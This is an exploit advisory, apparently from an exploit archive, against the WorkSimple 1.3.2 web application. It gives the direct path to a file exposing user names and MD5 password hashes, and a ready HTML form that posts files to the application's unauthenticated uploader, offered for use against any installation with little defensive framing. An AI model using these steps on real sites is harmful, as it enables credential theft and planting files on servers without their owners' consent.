id: 11032
date: 02/23/2010
title: worksimple_1.3.2 Multiple Remote Vulnerabilities
author: JiKo
cves: 

================================================
worksimple_1.3.2 Multiple Remote Vulnerabilities
================================================

[ Multiple Remote Vulnerabilities ]
----------[Script Info]
 
Moi : JIKO
 
----------[Script Info]
 
Name : WorkSimple
Site:http : http://geekness.eu/ or http://easton.4fd.us/
Download : http://geekness.eu/sites/default/files/worksimple_1.3.2.zip
 
----------[exploit Info]
 
1]~[Password Disclosure Vulnerability]
 
For All Version
 
http://localhost/Path/data/secret.php
 
Name:Md5(Pass)
 
1]~[Remote File Upload Vulnerability]
file :/modules/uploader.php?startupload
array(".phps",".txt",".html",".png", ".html", ".htm",".jpg",".png", ".bmp",".c",".cpp", ".css", ".h", ".gif", ".torrent", ".jpeg");
---
<form enctype='multipart/form-data' action='[SITE]/modules/uploader.php?startupload' method='post'>
<input type='hidden' name='MAX_FILE_SIZE' value='500000' />
Upload a file: <input name='uploadedfile' size='14' type='file' />
<BR><BR>
<input class='button' type='submit' value='upload' />
</form>
---



#  0day.today [2023-03-25]  #